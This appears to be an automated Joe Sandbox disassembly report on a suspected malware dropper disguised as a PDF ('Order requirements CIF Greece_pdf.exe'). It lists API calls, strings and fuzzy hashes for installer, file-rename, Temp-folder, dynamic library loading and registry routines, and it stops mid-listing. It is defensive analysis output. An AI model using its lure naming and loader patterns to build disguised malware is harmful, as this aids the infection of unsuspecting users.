Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N
API String ID: 3103080414-2140067464
Opcode ID: 89bfaba4aad14bbdc3ef2aca23760d41403bea85feb245a06943091ca1e46a07
Instruction ID: 9df2d5718f770f504e0a3d1761d641f71338e4c23cddda8a7d5dd424fc5a0579
Opcode Fuzzy Hash: 89bfaba4aad14bbdc3ef2aca23760d41403bea85feb245a06943091ca1e46a07
Instruction Fuzzy Hash: 2A61B1B1A40208BFDF109F60DD45F6A3B69FB84715F10802AFB05BA2D1D7B8A951CF99

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,?), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Bysamfund,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
Bysamfund, xrefs: 00401150

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: Bysamfund$F
API String ID: 941294808-3307120823
Opcode ID: 2b80ecd39af3c7aade96203546a39d5d88e703590141695a35fb255926c22a0b
Instruction ID: 8cb536a74e8a95367a30f9a40e648d77c0c0257b52f8be6e86691cf172308c2f
Opcode Fuzzy Hash: 2b80ecd39af3c7aade96203546a39d5d88e703590141695a35fb255926c22a0b
Instruction Fuzzy Hash: 1D417B71800249AFCF058FA5DE459AF7BB9FF45314F00802AF991AA1A0C7789A55DFA4

Function 00405D43 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405ED4,?,?), ref: 00405D74
GetShortPathNameA.KERNEL32(?,007A12F8,00000400), ref: 00405D7D

Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14

GetShortPathNameA.KERNEL32(?,007A16F8,00000400), ref: 00405D9A
wsprintfA.USER32 ref: 00405DB8
GetFileSize.KERNEL32(00000000,00000000,007A16F8,C0000000,00000004,007A16F8,?,?,?,?,?), ref: 00405DF3
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E02
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E3A
SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,007A0EF8,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405E90
GlobalFree.KERNEL32(00000000), ref: 00405EA1
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EA8

Part of subcall function 00405C6D: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,80000000,00000003), ref: 00405C71
Part of subcall function 00405C6D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93

Strings

[Rename], xrefs: 00405E22, 00405E34
%s=%s, xrefs: 00405DAE

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: 0b1fe35b626d56e42c997f45168692cc3ef83c098e0f1d716f4da02acec9d6b8
Instruction ID: 3bd9902b6e4cfcbbd8c27daddc785bf5092739fd3612ff4c635abc71f9dbf801
Opcode Fuzzy Hash: 0b1fe35b626d56e42c997f45168692cc3ef83c098e0f1d716f4da02acec9d6b8
Instruction Fuzzy Hash: 30312531200B156FD3206B75DD48F2B3A5CDF85754F14043AB981F62D2DB7CE9018AAD

Function 004063AF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406407
CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406414
CharNextA.USER32(?,"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406419
CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406429

Strings

"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe", xrefs: 004063EB
*?|<>/":, xrefs: 004063F7
C:\Users\user\AppData\Local\Temp\, xrefs: 004063B0

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2843978109
Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
Instruction ID: 4c47756038ac22285ba0d5cec53aa64a9461198f7a7023556037c09898c6efe2
Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
Instruction Fuzzy Hash: 5B11B6514047A129EB3216285C40B77BF888B97760F19407BE8D2722C2D77C5C5297BD

Function 004041BF Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004041DC
GetSysColor.USER32(00000000), ref: 0040421A
SetTextColor.GDI32(?,00000000), ref: 00404226
SetBkMode.GDI32(?,?), ref: 00404232
GetSysColor.USER32(?), ref: 00404245
SetBkColor.GDI32(?,?), ref: 00404255
DeleteObject.GDI32(?), ref: 0040426F
CreateBrushIndirect.GDI32(?), ref: 00404279

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction ID: 0c29b1994579108119522ba9b7e42ccb12df1f79812dc60d22c4570354a7e24a
Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction Fuzzy Hash: 6021A4B16007049BCB309F78DD08B5BBBF8AF81754B14896EFD92A26E0C734E904CB54

Function 00404AAB Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AC6
GetMessagePos.USER32 ref: 00404ACE
ScreenToClient.USER32(?,?), ref: 00404AE8
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404AFA
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B20

Strings

f, xrefs: 00404AFC

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction ID: 246458a00becd8bf3e45cced134e1bc678ff0f74541da5adfbd61824d77d36c3
Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction Fuzzy Hash: BC015E71900219BADB00DBA4DD85BFFBBBCAF55B11F10012BBB40B61D0C7B4A941CBA4

Function 00401E35 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
ReleaseDC.USER32(?,00000000), ref: 00401E6B
CreateFontIndirectA.GDI32(0040B808), ref: 00401EBA

Strings

Times New Roman, xrefs: 00401EA0

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: fc9f16b01a24cae65528eb59c91fd2b9324a8e2726ec0d721fc5ceb8334f1a1e
Instruction ID: 57ae00d383071d6c5df03c611de82deed4414851ba4a5b5ac7ac255a7617b9b1
Opcode Fuzzy Hash: fc9f16b01a24cae65528eb59c91fd2b9324a8e2726ec0d721fc5ceb8334f1a1e
Instruction Fuzzy Hash: 0E019672500240AFD7006BB0AE4A79A3FF8D755301F108839F241B62F2C67804458BAC

Function 00402DBA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
MulDiv.KERNEL32(000CAB67,00000064,000CB470), ref: 00402E00
wsprintfA.USER32 ref: 00402E10
SetWindowTextA.USER32(?,?), ref: 00402E20
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32

Strings

verifying installer: %d%%, xrefs: 00402E0A

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 0d8e9bd33d69446e06833ca67107590e0434e761be11da362e4462339046e7f4
Instruction ID: 5b578c44cce9eb850d5b1a327d08a3d6af9bf3f213875045bca18d45615f3dab
Opcode Fuzzy Hash: 0d8e9bd33d69446e06833ca67107590e0434e761be11da362e4462339046e7f4
Instruction Fuzzy Hash: 6601447064020DFBEF109F60DE09EAE3769AB04304F00803AFA06A51D0DBB899519B5D

Function 004056C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405704
GetLastError.KERNEL32 ref: 00405718
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040572D
GetLastError.KERNEL32 ref: 00405737

Strings

C:\Users\user\Desktop, xrefs: 004056C1
C:\Users\user\AppData\Local\Temp\, xrefs: 004056E7

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-2028306314
Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction ID: 68da7140adab9ac89dc439175e59da9b3464284d57dce40cdacedd7e8d7715c7
Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction Fuzzy Hash: E2011671C00219EADF00DFA1C944BEFBBB8EF04354F00403AD944B6290E7B89648DFA9

Function 004027DF Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,0001C400,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
GlobalFree.KERNEL32(?), ref: 0040288E
GlobalFree.KERNEL32(00000000), ref: 004028A1
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: e164bca3ed8cb23219c9b1014790a6721b2d0210796978c328ac0771c4fb54ad
Instruction ID: 541bef3258e2720658000fa94f276f2b73ea2b938264a1111491e3e624c892cf
Opcode Fuzzy Hash: e164bca3ed8cb23219c9b1014790a6721b2d0210796978c328ac0771c4fb54ad
Instruction Fuzzy Hash: BA21A072800128BBDF217FA5CE48DAE7E79EF05324F20423EF551762D1C67949418FA8

Function 0040209D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8

Part of subcall function 004051FB: lstrlenA.KERNEL32(subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
Part of subcall function 004051FB: lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,74DF23A0), ref: 00405257
Part of subcall function 004051FB: SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152

Strings

Clona $, xrefs: 0040211C

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: Clona $
API String ID: 2987980305-3062373426
Opcode ID: 31f3efabba134dcde3e73c1716287688f134fa7e0995aad628bd88176131b709
Instruction ID: b82e27a23205e400b7882a9dda540b85adfac7e99319b749728402aba69a9ded
Opcode Fuzzy Hash: 31f3efabba134dcde3e73c1716287688f134fa7e0995aad628bd88176131b709
Instruction Fuzzy Hash: 55213B32500110EBCF207F608F48A5F36B0AF51358F20423BF601B51D0CBBC49829A1E

Function 00402CD0 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
